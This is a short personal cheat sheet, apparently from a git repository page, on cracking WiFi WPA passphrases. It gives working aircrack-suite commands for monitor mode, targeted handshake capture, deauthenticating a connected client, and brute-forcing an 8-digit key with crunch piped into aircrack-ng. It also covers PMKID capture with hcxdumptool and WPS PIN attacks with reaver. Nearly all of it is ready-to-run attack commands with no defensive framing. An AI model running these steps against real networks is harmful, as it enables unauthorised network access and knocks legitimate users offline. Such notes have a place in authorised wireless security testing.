Contents of www.benpro.fr https://www.benpro.fr
You can not select more than 25 topics Topics must start with a letter or number, can include dashes ('-') and can be up to 35 characters long.

67 lines
1.1 KiB

1 year ago
1 year ago
1 year ago
1 year ago
1 year ago
1 year ago
1 year ago
1 year ago
1 year ago
1 year ago
  1. ## Monitor mode
  2. For my RTL8188EUS:
  3. ```
  4. ip link set wlanX down
  5. iw dev wlanX set type monitor
  6. ```
  7. ## Scan networks
  8. All channels:
  9. ```
  10. airodump-ng wlanX
  11. ```
  12. Specific channel:
  13. ```
  14. airodump-ng -c 6 wlanX
  15. ```
  16. ## Save a capture of chosen BSSID
  17. ```
  18. airodump-ng -c 6 --bssid 00:23:B1:82:08:xx -w <filename> wlanX
  19. ```
  20. You need to wait for a client to connect, or to deauth it and get the 4-way handshake.
  21. ```
  22. aireplay-ng -0 1 -a 00:23:B1:82:0C:xx -c D0:37:45:2F:52:xx wlanX
  23. ```
  24. `-a` is access point
  25. `-c` is client
  26. Then you should have an EAPOL/WPA handshake.
  27. ## Crack WPA passphrase
  28. ### For a 8 digits scheme
  29. ```
  30. crunch 8 8 0123456789 -s 00000000 | aircrack-ng -w - -b 00:23:B1:82:08:xx <filename>.cap
  31. ```
  32. ## Wireshark
  33. PSK Generator: <https://www.wireshark.org/tools/wpa-psk.html>
  34. ## PMKID method
  35. ```
  36. hcxdumptool -i wlanX -o PMKID --enable_status=1
  37. ```
  38. TODO...
  39. ## WPS method
  40. AP must have WPS enabled with a PIN. Not PBC, push button.
  41. ```
  42. reaver -i wlanX -b 00:23:B1:82:84:xx
  43. ```
  44. ## Resources
  45. <https://github.com/ZerBea/hcxdumptool>
  46. <https://github.com/ZerBea/hcxtools>
  47. <https://wpa-sec.stanev.org/>